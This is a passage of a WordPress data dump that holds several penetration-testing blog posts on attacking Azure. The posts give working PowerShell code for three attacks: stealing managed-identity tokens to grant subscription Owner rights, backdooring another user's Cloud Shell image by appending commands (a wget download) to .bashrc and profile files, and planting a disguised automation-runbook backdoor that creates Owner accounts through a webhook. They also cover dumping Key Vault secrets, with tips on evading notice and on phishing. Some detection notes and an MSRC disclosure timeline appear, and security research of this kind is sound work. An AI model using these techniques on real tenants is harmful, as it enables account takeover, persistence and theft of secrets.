best-practices-to-protect-your-organizations-cloud-assets [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:58:17 [post_modified_gmt] => 2021-06-02 08:58:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17411 [menu_order] => 44 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [12] => WP_Post Object ( [ID] => 17432 [post_author] => 2 [post_date] => 2020-02-21 14:14:45 [post_date_gmt] => 2020-02-21 14:14:45 [post_content] =>

When a business migrates anything to a cloud infrastructure, there are a handful of common security gaps that we find as penetration testers. In this webinar, we'll share:

  • How data and access keys can be exposed
  • How user credentials can deliver privileges to more resources than intended
  • How access to a cloud account can provide an entry point to a corporate network via a VPN

We'll also share how to use cloud penetration testing as part of a cloud security testing program.

https://youtu.be/ffBcIkjumBc
[post_title] => Intro to Cloud Penetration Testing [post_excerpt] => Experts in pen testing cloud apps & infrastructure for vulnerabilities & misconfiguration. Learn about cloud pen testing and common cloud security gaps in this video now. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => intro-to-cloud-penetration-testing [to_ping] => [pinged] => [post_modified] => 2021-06-02 08:58:59 [post_modified_gmt] => 2021-06-02 08:58:59 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=17432 [menu_order] => 49 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 11234 [post_author] => 10 [post_date] => 2020-02-20 07:00:37 [post_date_gmt] => 2020-02-20 07:00:37 [post_content] =>

Azure Managed Identities are Azure AD objects that allow Azure virtual machines to act as users in an Azure subscription. While this may sound like a bad idea, AWS utilizes IAM instance profiles for EC2 and Lambda execution roles to accomplish very similar results, so it's not an uncommon practice across cloud providers. In my experience, they are not as commonly used as AWS EC2 roles, but Azure Managed Identities may be a potential option for privilege escalation in an Azure subscription.

TL;DR - Managed Identities on Azure VMs can be given excessive Azure permissions. Access to these VMs could lead to privilege escalation.

Much like other Azure AD objects, these managed identities can be granted IAM permissions for specific resources in the subscription (storage accounts, databases, etc.) or they can be given subscription level permissions (Reader, Contributor, Owner). If the identity is given a role (Contributor, Owner, etc.) or privileges higher than those granted to the users with access to the VM, users should be able to escalate privileges from the virtual machine.

Vmtophat

Important note: Anyone with command execution rights on a Virtual Machine (VM) that has a Managed Identity can execute commands as that managed identity from the VM.

Here are some potential scenarios that could result in command execution rights on an Azure VM:

Identifying Managed Identities

In the Azure portal, there are a couple of different places where you will be able to identify managed identities. The first option is the Virtual Machine section. Under each VM, there will be an "Identity" tab that will show the status of that VM's managed identity.

Id

Alternatively, you will be able to note managed identities in any Access Control (IAM) tabs where a managed identity has rights. In this example, the MGITest identity has Owner rights on the resource in question (a subscription).

Iam

From the AZ CLI - AzureAD User

To identify managed identities as an authenticated AzureAD user on the CLI, I normally get a list of the VMs (az vm list) and pipe that into the command to show identities.

Here's the full one-liner that I use (in an authenticated AZ CLI session) to identify managed identities in a subscription.

(az vm list | ConvertFrom-Json) | ForEach-Object {$_.name;(az vm identity show --resource-group $_.resourceGroup --name $_.name | ConvertFrom-Json)}

Since the principalId (a GUID) isn't the easiest thing to use to identify the specific managed identity, I print the VM name ($_.name) first to help figure out which VM (MGITest) owns the identity.

Mi List

From the AZ CLI - On the VM

Let's assume that you have a session (RDP, PS Remoting, etc.) on the Azure VM and you want to check if the VM has a managed identity. If the AZ CLI is installed, you can use the "az login --identity" command to authenticate as the VM to the CLI. If this is successful, you have confirmed that you have access to a Managed Identity.

From here, your best bet is to list out your permissions for the current subscription:

az role assignment list --assignee ((az account list | ConvertFrom-Json).id)

Alternatively, you can enumerate through other resources in the subscription and check your rights on those IDs/Resource Groups/etc:

az resource list

az role assignment list --scope "/subscriptions/SUB_ID_GOES_HERE/PATH_TO_RESOURCE_GROUP/OR_RESOURCE_PATH"

From the Azure Metadata Service

If you don't have the AZ CLI on the VM that you have access to, you can still use PowerShell to make calls out to the Azure AD OAuth token service to get a token to use with the Azure REST APIs. While it's not as handy as the AZ CLI, it may be your only option.

To do this, invoke a web request to 169.254.169.254 for the oauth2 API with the following command:

Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing

If this returns an actual token, then you have a Managed Identity to work with. This token can then be used with the REST APIs to take actions in Azure. A simple proof of concept for this is included in the demo section below.

You can think of this method as similar to gathering AWS credentials from the metadata service from an EC2 host. Plenty has been written on that subject, but here's a good primer blog for further reading.

Limitations

Microsoft does limit the specific services that accept managed identities as authentication - Microsoft Documentation Page

Due to the current service limitations, the escalation options can be a bit limited, but you should have some options.

Privilege Escalation

Once we have access to a Managed Identity, and have confirmed the rights of that identity, then we can start escalating our privileges. Below are a few scenarios (descending by level of permissions) that you may find yourself in with a Managed Identity.

  • Identity is a Subscription Owner
    • Add a guest account to the subscription
      • Add that guest as an Owner
    • Add an existing domain user to the subscription as an Owner
      • See the demo below
  • Identity is a Subscription Contributor
    • Virtual Machine Lateral Movement
      • Managed Identity can execute commands on another VMs via Azure CLI or APIs
    • Storage Account Access
    • Configuration Access
  • Identity has rights to other subscriptions
    • Pivot to other subscription, evaluate permissions
  • Identity has access to Key Vaults
  • Identity is a Subscription Reader
    • Subscription Information Enumeration
      • List out available resources, users, etc for further use in privilege escalation

For more information on Azure privilege escalation techniques, check out my DerbyCon 9 talk:

Secondary Access Scenarios

You may not always have direct command execution on a virtual machine, but you may be able to indirectly run commands via Automation Account Runbooks.

I have seen subscriptions where a user does not have contributor (or command execution) rights on a VM, but they have Runbook creation and run rights on an Automation account. This automation account has subscription contributor rights, which allows the lesser privileged user to run commands on the VM through the Runbook. While this in itself is a privilege inheritance issue (See previous Key Vault blog), it can be abused by the previously outlined process to escalate privileges on the subscription.

Proof of Concept Code

Below is a basic PowerShell proof of concept that uses the Azure REST APIs to add a specific user to the subscription Owners group using a Managed Identity.

Proof of Concept Code Sample

All the code is commented, but the overall script process is as follows:

  1. Query the metadata service for the subscription ID
  2. Request an OAuth token from the metadata service
  3. Query the REST APIs for a list of roles, and find the subscription "Owner" GUID
  4. Add a specific user (see below) to the subscription "Owners" IAM role

The provided code sample can be modified (See: "CHANGE-ME-TO-AN-ID") to add a specific ID to the subscription Owners group.
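As a rough illustration of that flow (this is my own simplified sketch, not the exact MicroBurst code), the role assignment itself is just a single PUT to the Azure authorization REST API. The principal ID is the same "CHANGE-ME-TO-AN-ID" placeholder mentioned above, and the token request mirrors the metadata call shown earlier:

# Get the subscription ID and a management token from the instance metadata service
$metadata = Invoke-RestMethod -Uri 'http://169.254.169.254/metadata/instance?api-version=2019-06-01' -Headers @{Metadata="true"}
$subId    = $metadata.compute.subscriptionId
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$ArmToken = ($response.Content | ConvertFrom-Json).access_token
$headers  = @{ Authorization = "Bearer $ArmToken" }

# Look up the built-in "Owner" role definition ID for the subscription
$roleUri = "https://management.azure.com/subscriptions/$subId/providers/Microsoft.Authorization/roleDefinitions?api-version=2018-01-01-preview&`$filter=roleName%20eq%20'Owner'"
$ownerRoleId = (Invoke-RestMethod -Uri $roleUri -Headers $headers).value[0].id

# Assign the Owner role to the target principal at the subscription scope
$body = @{ properties = @{ roleDefinitionId = $ownerRoleId; principalId = "CHANGE-ME-TO-AN-ID" } } | ConvertTo-Json
$assignUri = "https://management.azure.com/subscriptions/$subId/providers/Microsoft.Authorization/roleAssignments/$((New-Guid).Guid)?api-version=2018-09-01-preview"
Invoke-RestMethod -Uri $assignUri -Method Put -Headers $headers -Body $body -ContentType "application/json"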

While this is a little difficult to demo, we can see in the screenshot below that a new principal ID (starting with 64) was added to the Owners group as part of the script execution.

Poc

2/25/20 - Update:

I created a secondary PoC function that will probably be more practical for everyday use. The function uses the same methods to get a token, but it uses the REST APIs to list out all of the available storage account keys. So if you have access to an Azure VM that is configured with Contributor or Storage Account Contributor, you should be able to list out all of the keys. These keys can then be used (See Azure Storage Explorer) to remotely access the storage accounts and give you further access to the subscription.

You can find the sample code here - get-MIStorageKeys.ps1

Conclusion

I have been in a fair number of Azure environments and can say that managed identities are not heavily used. But if a VM is configured with an overly permissive Managed Identity, this might be a handy way to escalate. I have actually seen this exact scenario (Managed Identity as an Owner) in a client environment, so it does happen.

From a permissions management perspective, you may have a valid reason for using managed identities, but double check how this identity might be misused by anyone with access (intentional or not) to the system.

[post_title] => Azure Privilege Escalation Using Managed Identities [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => azure-privilege-escalation-using-managed-identities [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:58:33 [post_modified_gmt] => 2021-06-08 21:58:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11234 [menu_order] => 172 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [14] => WP_Post Object ( [ID] => 11179 [post_author] => 10 [post_date] => 2019-12-10 07:00:04 [post_date_gmt] => 2019-12-10 07:00:04 [post_content] => TLDR; By default, Azure Subscription Contributors have access to all storage accounts in a subscription. These storage accounts can contain Azure Cloud Shell storage files (Linux home directories) that can contain sensitive information. By modifying these Cloud Shell files, an attacker can execute commands in the Cloud Shell sessions of other users. This can lead to cross-account command execution and privilege escalation.

Intro

The Azure Cloud Shell (Bash or PowerShell) can be a handy way to manage Azure resources, but it can also be a potential source of sensitive data and privilege escalation during a penetration test. Azure Cloud Shell allows users to manage resources in Azure from “anywhere”. This includes shell.azure.com, the Azure mobile app, and the (new-ish and pretty fantastic) Microsoft Terminal application. I haven’t really found a practical way to use the Cloud Shell from the mobile app yet, but it’s an option.

In order to maintain a consistent experience from wherever/whenever you log in, the Cloud Shell service keeps files in an Azure Storage account in your subscription. The Cloud Shell will be configured with a storage account of your choosing, and the actual files will be under the File Share Service for that storage account. If you’re using a storage account that was automatically generated from the Cloud Shell defaults, it will most likely be prefaced with “cs”.

For more info on how Azure Cloud Shell persists files, check out this Microsoft documentation - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage

What Can We Do With Cloud Shell Files?

Let’s say that we’ve compromised an AzureAD account that has rights to read/write Cloud Shell File Shares. Usually this will be a contributor account on the subscription, but you may run into a user that has specific contributor rights to Storage Accounts.

Important Note: By default, all subscription Contributor accounts will have read/write access to all subscription Storage Accounts, unless otherwise restricted.

With this access, you should be able to download any available files in the Cloud Shell directory, including the acc_ACCT.img file (where ACCT is a name – see above: acc_john.img). If there are multiple users with Cloud Shell instances in the same Storage Account, there will be multiple folders in the Storage Account. As an attacker, choose the account that you would like to attack (john) and download the IMG file for that account. This file is usually 5 GB, so it may take a minute to download.

The IMG file is an EXT2 file system, so you can easily mount the file system on a Linux machine. Once mounted on your Linux machine, there are two paths that we can focus on.
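As a rough sketch of that collection step (assuming the Az PowerShell module and a Contributor session; the account, share, and path names below are all examples), you can hunt for the Cloud Shell storage accounts and pull the image down over the File Share APIs:

# Find likely Cloud Shell storage accounts (auto-generated ones are usually prefixed with "cs")
Get-AzStorageAccount | Where-Object { $_.StorageAccountName -like 'cs*' } | Select-Object ResourceGroupName, StorageAccountName

# Build a storage context for the target account and list the file shares
$key = (Get-AzStorageAccountKey -ResourceGroupName "cloud-shell-storage-centralus" -Name "csexample123")[0].Value
$ctx = New-AzStorageContext -StorageAccountName "csexample123" -StorageAccountKey $key
Get-AzStorageShare -Context $ctx

# Download the victim's Cloud Shell image (~5 GB) for offline mounting and review
Get-AzStorageFileContent -Context $ctx -ShareName "cs-john-example-com-1234567890" -Path ".cloudconsole/acc_john.img" -Destination ".\acc_john.img"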

Information Disclosure

If the Cloud Shell was used for any real work (not just accidentally opened once…), there is a chance that the user operating the shell made some mistakes in their commands. If these mistakes were made with any of the Azure PowerShell cmdlets, the resulting error logs would end up in the .Azure (note the capital A) folder in the IMG file system. The New-AzVM cmdlet is particularly vulnerable here, as it can end up logging credentials for local administrator accounts for new virtual machines. In this case, we tried to create a VM with a non-compliant name. This caused an error which resulted in the "Cleartext?" password being logged.
PS Azure:> grep -b5 -a5 Password .Azure/ErrorRecords/New-AzVM_2019-10-18-T21-39-25-103.log
103341-      }
103349-    },
103356-    "osProfile": {
103375-      "computerName": "asdfghjkllkjhgfdasqweryuioasdgkjalsdfjksasdf",
103445-      "adminUsername": "netspi",
103478:      "adminPassword": "Cleartext?",
103515-      "windowsConfiguration": {}
103548-    },
103555-    "networkProfile": {
103579-      "networkInterfaces": [
103608-        {
If you’re parsing Cloud Shell IMG files, make sure that you look at the .Azure/ErrorRecords files for any sensitive information, as you might find something useful. Additionally, any of the command history files may have some interesting information:
  • .bash_history
  • .local/share/powershell/PSReadLine/ConsoleHost_history.txt

Cross-Account Command Execution

Let’s assume that you’ve compromised the “Bob” account in an Azure subscription. Bob is a Contributor on the subscription and shares the subscription with the “Alice” account. Alice is the owner of the subscription, and a Global Administrator for the Azure tenant. Alice is a Cloud Shell power user and has an instance on the subscription that Bob works on.

Since Bob is a Contributor in the subscription, he has the rights (by default) to download any Cloud Shell .IMG file, including Alice's acc_alice.img. Once downloaded, Bob mounts the IMG file in a Linux system (mount acc_alice.img /mnt/) and appends any commands that he would like to run to the following two files:
  • .bashrc
  • /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
We'll download MicroBurst to the Cloud Shell as a proof of concept:
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> .bashrc
$ echo 'wget https://github.com/NetSPI/MicroBurst/archive/master.zip' >> /home/alice/.config/PowerShell/Microsoft.PowerShell_profile.ps1
Once Bob has added his attacking commands (see suggested commands below), he unmounts the IMG file and uploads it back to the Azure Storage Account. When you go to upload the file, make sure that you select the “Overwrite if files already exist” box. When the upload has completed, the Cloud Shell environment is ready for the attack. The next Cloud Shell instance launched by the Alice account (from that subscription) will run the appended commands under the context of the Alice account. Note that this same attack could potentially be accomplished by mounting the file share in an Azure Linux VM instead of downloading, modifying, and uploading the file.
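The re-upload can also be scripted instead of clicked through the portal. Reusing the storage context from the earlier sketch (the share and file names are still examples), something like this should overwrite the original image:

# Overwrite the victim's Cloud Shell image with the modified copy (-Force replaces the existing file)
Set-AzStorageFileContent -Context $ctx -ShareName "cs-alice-example-com-1234567890" -Source ".\acc_alice.img" -Path ".cloudconsole/acc_alice.img" -Force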

Example:

In this example, we've just modified both files to echo "Hello World" as a proof of concept. By modifying both the .bashrc and PowerShell Profile files, we have also ensured that our commands will run regardless of the type of Cloud Shell that is selected.

At this point, your options for command execution are endless, but I'd suggest using this to add your current user as a more privileged user (Owner) on the current subscription or other subscriptions in the tenant that your victim user has access to. If you're unsure of what subscriptions your victim user has access to, take a look at the .azure/azureProfile.json file in their Cloud Shell directory.

Finally, if your target user isn't making use of a Cloud Shell during your engagement, a well-placed phishing email with a link to https://shell.azure.com/ could be used to get a user to initiate a Cloud Shell session.

MSRC Disclosure Timeline

Both of these issues (Info Disclosure and Privilege Escalation) were submitted to MSRC:
  • 10/21/19 – VULN-011207 and VULN-011212 created and assigned case numbers
  • 10/25/19 - Privilege Elevation issue (VULN-011212) status changed to "Complete"
    • MSRC Response: "Based on our understanding of your report, this is expected behavior. Allowing a user access to storage is the equivalent of allowing access to a home directory. In this case, we are giving end users the ability to control access to storage accounts and file shares. End users should only grant access to trusted users."
  • 10/28/19 - Additional Context sent to MSRC to clarify the standard Storage Account permissions
  • 11/1/19 - Information Disclosure issue (VULN-011207) status changed to "Complete"
    • Truncated MSRC Response: "The engineering team has reviewed your findings, and we have determined that this is the current designed behavior for logging. While this specific logging ability is not described well in our documentation, there is some guidance around storage account creation to limit who has access to the log files - https://docs.microsoft.com/en-us/azure/cloud-shell/persisting-shell-storage#create-new-storage.
      In the future, the team is considering the option of adding more detail into the documentation to describe the scenario you reported along with guidance on protecting access to log files. They are also looking into additional protections that can be added into Cloud Shell as new features to better restrict access or obfuscate entries that may contain secrets."
  • 12/4/19 - Cloud Shell privilege escalation issue (VULN-011212) status changed to "Complete"
Special thanks go out to one of our NetSPI security consultants, Jake Karnes, who was really helpful in testing out the Storage account contributor rights and patiently waited for the upload/download of the 5 GB IMG test files. [post_title] => Azure Privilege Escalation via Cloud Shell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-azure-cloud-shell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:55 [post_modified_gmt] => 2021-06-08 21:57:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11179 [menu_order] => 184 [post_type] => post [post_mime_type] => [comment_count] => 1 [filter] => raw ) [15] => WP_Post Object ( [ID] => 10747 [post_author] => 10 [post_date] => 2019-09-12 07:00:30 [post_date_gmt] => 2019-09-12 07:00:30 [post_content] => In every penetration test that involves Azure, we want to escalate our privileges up to a global administrator of the tenant. Once we've escalated our privileges in an Azure tenant, we want to have the ability to maintain our access to each subscription and the tenant as a whole. Aside from the benefits of controlling the Azure tenant, it can be really handy to have an Azure backdoor that could (potentially) be used to pivot back into the main AD environment. After escalating privileges in the Azure Tenant, we can make use of Automation Runbooks to persist in the Azure environment. There are multiple ways to persist in Azure, but for this post, we will focus on using Automation Accounts that are configured with excessive privileges, automation runbooks, and webhook triggers that will allow us to regain access to an Azure environment, with a single POST request.

TLDR

Want to maintain privileges in Azure? Add an Automation Account with excessive privileges that can be used to add new accounts (with Subscription Owner permissions) to AzureAD via a single POST request.

Potential Persistence Scenario

For the purposes of this blog, imagine this fairly standard Azure attack life cycle:
  1. Attacker compromises an Azure account/system
  2. Attacker escalates Azure privileges up to Global Administrator
  3. Blue team revokes initial access and/or Global Administrator access
In this type of scenario, we will want to have some type of persistence option available to re-enable our access into a tenant. Based on my experience, Automation accounts typically fly under the radar. If they are set up properly, they can be used to regain Owner (or higher*) permissions to subscriptions in the Azure tenant with a new AzureAD account. Since newly created Azure accounts are more likely to get noticed, they should be used for short-term access, while the Automation Accounts act as the long-haul persistence mechanism. The Automation Accounts can also be configured for password access or cert-based authentication, so those can also be an option for getting back into the subscription.

General Process:

  1. Create a new Automation Account
  2. Import a new runbook that creates an AzureAD user with Owner permissions for the subscription*
    1. Sample runbook for this Blog located here - https://github.com/NetSPI/MicroBurst
  3. Add the AzureAD module to the Automation account
    1. Update the Azure Automation Modules
  4. Assign "User Administrator" and "Subscription Owner" rights to the automation account
  5. Add a webhook to the runbook
  6. Eventually lose your access...
  7. Trigger the webhook with a post request to create the new user
*This runbook could be modified to be run as a global admin that creates a new global admin, but that's really noisy. Let me know if you do this. I'd be interested to see how well it works.

I realize this is a bit of legwork just to maintain persistence. The eventual goal is to automate this process with some PowerShell and integrate it with the existing MicroBurst tools.
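For reference, a rough sketch of what the imported runbook might look like is below. This is my own simplified illustration, not the exact runbook published in MicroBurst; the UPN domain is a placeholder, and the webhook body parsing is intentionally minimal:

param(
    [Parameter(Mandatory = $false)]
    [object]$WebhookData
)

# Pull the requested username/password out of the webhook POST body
$request  = ConvertFrom-Json -InputObject $WebhookData.RequestBody
$username = $request.RequestBody.Username
$password = $request.RequestBody.Password

# Authenticate as the Automation Account RunAs service principal (AzureRM and AzureAD modules)
$conn = Get-AutomationConnection -Name "AzureRunAsConnection"
Connect-AzureRmAccount -ServicePrincipal -TenantId $conn.TenantId -ApplicationId $conn.ApplicationId -CertificateThumbprint $conn.CertificateThumbprint | Out-Null
Connect-AzureAD -TenantId $conn.TenantId -ApplicationId $conn.ApplicationId -CertificateThumbprint $conn.CertificateThumbprint | Out-Null

# Create the new AzureAD user (the onmicrosoft.com domain is a placeholder)
$passwordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
$passwordProfile.Password = $password
$user = New-AzureADUser -DisplayName $username -UserPrincipalName "$username@EXAMPLE.onmicrosoft.com" -MailNickName $username -AccountEnabled $true -PasswordProfile $passwordProfile

# Grant the new user Owner rights on the current subscription
New-AzureRmRoleAssignment -ObjectId $user.ObjectId -RoleDefinitionName "Owner" -Scope "/subscriptions/$((Get-AzureRmContext).Subscription.Id)"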

Creating the Automation Account

Navigate to the "Automation Accounts" section of the Azure portal and create a new automation account. Naming it something basic, like BackupAutomationProcess, should avoid raising too much suspicion. Make sure that you set the "Create Azure Run As account" option to yes, as this will be needed to run the backdoor runbook code.

If you want to blend in with the default runbooks, the imported runbook name should follow the same naming strategy as the tutorials (AzureAutomationTutorial*). If you follow this naming convention, you will want to import and publish your malicious runbook into the account as soon as possible. The closer the timestamp is to your other tutorial runbooks, the less suspicious it will be. Can you tell which of these runbooks is the malicious one?

Once imported, you will also need to publish the runbook. This will then allow you to set a webhook for remote triggering of the runbook. To set the webhook, go to the Webhooks tab under the runbook. Depending on how long your operation is running, you may want to set your expiration date way off in the future to protect your ability to trigger the webhook.

Important Step - Copy the webhook URL and keep it for when you need to trigger your backdoor.

Module Maintenance

Since the AzureAD module is not standard for Automation Accounts, you will need to import it into your account. Go to the Modules tab for the Automation account and use the "Browse Gallery" feature to find the "AzureAD" module. Import it into your account and wait a few (5-10) minutes for it to deploy. The modules can sometimes take a while to populate to the Automation Accounts, so be patient.

Additionally, your Automation Account may not play nicely with the current/old version of the AzureRM modules. I don't really know why this is still an issue for Azure, but you may need to update your Azure Automation Modules. This can be done with this runbook - https://aka.ms/UpdateModulesRunbookGitHub

Since we're using a new Automation Account, the updates shouldn't cause any issues with existing runbooks. Alternatively, if you're using an existing Automation account for all of this, updating the modules could cause compatibility issues with existing runbooks. You would also need to assign the additional rights to the existing automation account, which is what we will cover next.

Setting Automation Account Rights

Once the automation account is configured and the webhook is set, the automation account will need the proper rights to add a new user and give it owner rights on the subscription. To add these rights, navigate to the Azure Active Directory tab with a tenant admin account, and open the "Roles and Administrators" section. Within that section, open the "User Administrator" role and add the automation account to the group. The Automation Account will be labeled with the name of the account, with a base64 string appended at the end.

Given the fact that this username may stick out against the other users in the group, you may want to rename the Automation Account. This can be done in the AzureAD->App Registrations section, under "Branding".

After adding user administrator rights, the automation account user will need to be added as an owner on the subscription. This can be done through the subscriptions tab. Select the subscription that you want to persist in, and go to the Access Control (IAM) tab. Add the Owner role assignment to your Automation account, and you should be all set. This will also take a few minutes to populate, so give it a little while before you actually try to trigger the webhook.

Triggering the Webhook

Let's say that after escalating privileges and setting a persistence backdoor, the compromised tenant admin account gets flagged, and now you're locked out. Using the webhook URL from the earlier steps, and the example caller function below, you can now create a new subscription owner account (BlogDemoUser / Password123) for yourself in Azure.
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d"
$AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}})
$body = ConvertTo-Json -InputObject $AccountInfo
$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
This process may take a minute, as the runbook job will need to spool up, but after it has completed, you should have a newly minted subscription Owner account.

Potential Concerns and Detection Techniques

While this process can be somewhat quiet in the right environment, it may be fairly obvious in the wrong one. A couple of things to keep in mind:
  • Creating a new AzureAD user could/should trigger an alert
  • Creating a new Automation Account could/should trigger an alert
  • Adding a user to the User Administrators and Owners groups could/should trigger an alert
Since the Automation Accounts section is not typically in an Azure user's portal dashboard, an attacker may be able to hide out for a while in the automation account. [post_title] => Maintaining Azure Persistence via Automation Accounts [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => maintaining-azure-persistence-via-automation-accounts [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:57:47 [post_modified_gmt] => 2021-06-08 21:57:47 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=10747 [menu_order] => 191 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 10304 [post_author] => 10 [post_date] => 2019-03-20 07:00:23 [post_date_gmt] => 2019-03-20 07:00:23 [post_content] => This is the second post in a series of blogs that focuses on Azure Automation. Check out "Exporting Azure RunAs Certificates for Persistence" for more info on how authentication works for Automation Accounts. In this installment, we're going to focus on making use of Automation Accounts to gain access to sensitive data stored in Key Vaults. High Level TLDR:
  1. Gain access to an AzureAD account that has rights to create/modify/run automation runbooks in existing Automation Accounts
    1. This AzureAD account doesn't have access to any Key Vaults, but you want to read the vaults
  2. Access an Automation Account configured with rights to read keys from a Key Vault
  3. Add (or modify) a runbook for the Automation Account to access the Key Vault and dump the secrets
  4. Use your newfound secrets for further pivoting in the environment
I have been frequently running into situations where I have contributor access to a subscription, but I'm unable to access the data in the Azure Key Vaults. Since I can't grant myself access to the vaults (requires Owner rights), I've had to come up with some creative ways for accessing the Key Vaults with Contributor accounts.

Initial Access

Most of the time that we have access to a Contributor account in Azure, the account does not have access to any of the Key Vaults in the subscription. Security-conscious developers/engineers will limit the rights for normal users and assign application-specific accounts to handle accessing Key Vaults. This limits the liability put on user accounts, and keeps the secrets with the application service accounts. While we may not have access to the Key Vaults, we do have contributor rights on the Automation Account runbooks. This grants us the rights to create/modify/run automation runbooks for the existing Automation Accounts, which allows us to run code as automation users that may have rights to access Key Vaults.

So why does this happen? As a best practice for automating specific tasks within Azure, engineers may vault keys/credentials that are used by automation runbooks. The Automation Accounts are then granted access to the Key Vaults to make use of the keys/credentials as part of the automation process, helping abstract the credentials away from the runbook code and the users. Common Automation Key Vault Applications:
  • Keys for encrypting data in an application
  • Local administrator passwords for VMs
  • SQL database credentials for accessing AzureSQL databases
  • Access key storage for other Azure services
As a side note: Azure developers/engineers are getting better at making use of Key Vaults for automation credentials, but we still occasionally see credentials that are hard-coded in runbooks. If you have read access on runbooks, keep an eye out for hard-coded credentials.

Creating a New Runbook

In order to access the key vaults from the Automation Accounts, we will need to create a new runbook that will list out each of the vaults, along with all of the keys for each vault. We will then run this runbook with the RunAs account, along with any credentials configured for the account. So far, this shotgun approach has been the easiest way to enumerate key values in a vault, but it's not the most opsec-friendly method. In many of the environments that I've seen, there are specific alerting rules already set up for unauthorized access attempts to key vaults, so be careful when you're doing this.

It has been a little difficult trying to come up with a method for determining Automation user access before running a runbook in the Automation Account. There's no way to grab cleartext automation credentials from an Automation Account without running a runbook, and it's a little tricky (but possible) to get the Key Vault rights for RunAs accounts before running a runbook. In the grand scheme of things, you will need to run a runbook to pull the keys, so you might as well go for all the keys at once.

If you want to be more careful with the Automation Accounts that you use for this attack, keep an eye out for runbooks that have code to specifically read from Key Vaults. Chances are good that the account has access to one or more vaults. You can also choose the specific automation accounts that you want to use in the following script.
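The actual MicroBurst function is covered in the next section, but for reference, the core of this kind of runbook is fairly small. The sketch below is a rough illustration rather than the exact runbook the tool deploys, and it assumes the default "AzureRunAsConnection" is present in the Automation Account:

# Authenticate as the RunAs service principal from inside the runbook
$conn = Get-AutomationConnection -Name 'AzureRunAsConnection'
Add-AzureRmAccount -ServicePrincipal -TenantId $conn.TenantId -ApplicationId $conn.ApplicationId -CertificateThumbprint $conn.CertificateThumbprint | Out-Null

# Try to read every secret in every vault that the RunAs account can see
foreach ($vault in Get-AzureRmKeyVault) {
    foreach ($secret in (Get-AzureKeyVaultSecret -VaultName $vault.VaultName -ErrorAction SilentlyContinue)) {
        $value = Get-AzureKeyVaultSecret -VaultName $vault.VaultName -Name $secret.Name
        Write-Output ("{0} | {1} | {2}" -f $vault.VaultName, $secret.Name, $value.SecretValueText)
    }
}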

Automating the Process

At a high level, here's what we will accomplish with the "Get-AzureKeyVaults-Automation" PowerShell function:
  1. List the Automation Accounts
    1. Select the Automation Accounts that you want to use
  2. Iterate through the list and run a standardized runbook in each selected account (with a randomized job name)
    1. List all of the Key Vaults
    2. Attempt to read every key with the current account
    3. Complete these actions with both the RunAs and Stored Credential accounts
  3. Output all of the keys that you can access
    1. There may be duplicate results at the end due to key access overlap
This PowerShell function is available under the MicroBurst repository. You can find MicroBurst here - https://github.com/NetSPI/MicroBurst

Example

Here's a sample run of the function in my test domain:
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize

Conclusions

For the Attackers - You may have a situation where you need to access Key Vaults with a lesser privileged user. Hopefully the code/function presented in this blog allows you to move laterally to read the secrets in the vault.

For the Defenders - If you're using Automation Accounts in your subscription, there's a good chance that you will need to configure an Automation Account with Key Vault reader rights. When doing this, make sure that you're limiting the Key Vaults that the account has access to. Additionally, be careful with who you give subscription contributor access to. If a contributor is compromised, your Automation Accounts may just give up your secrets.

Update - 12/30/2019

This issue was not initially reported to MSRC, due to the fact that it's a user misconfiguration issue and not eligible for reporting per the MSRC guidelines ("Security misconfiguration of a service by a user"). However, they became aware of the blog and ended up issuing a CVE for it - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0962

Get-AzurePasswords: Exporting Azure RunAs Certificates for Persistence

This post will be the first blog in a series that focuses on Azure Automation. I've recently run into a fair number of clients making use of Azure Automation Runbooks, and in many cases, the runbooks are being misconfigured. For attackers, these misconfigurations can provide credentials, sensitive data, and some interesting points for escalation.

Here's the high-level TLDR of the scenario outlined in this blog:

  1. Gain access to an Azure AD account that has been provided runbook/Automation account permissions
  2. Create and run a runbook that gathers available RunAs certificate files
  3. Use the certificate files to maintain privileged access to an Azure environment
  4. Automate the whole process to simplify persistence options

Intro to Automation Accounts

Automation accounts are Azure's way of handling subscription process automation. Most implementations that I have been exposed to are set up to generate reports, copy over logs, or generally manage Azure resources. In general, the runbooks that I have seen are fairly simple and act as scheduled jobs to handle basic tasks. That being said, Automation runbooks can make use of many different modules, allowing you to administer multiple aspects of an Azure subscription.

Before we get too far, there are a couple of base terms to cover:

  • Automation Account
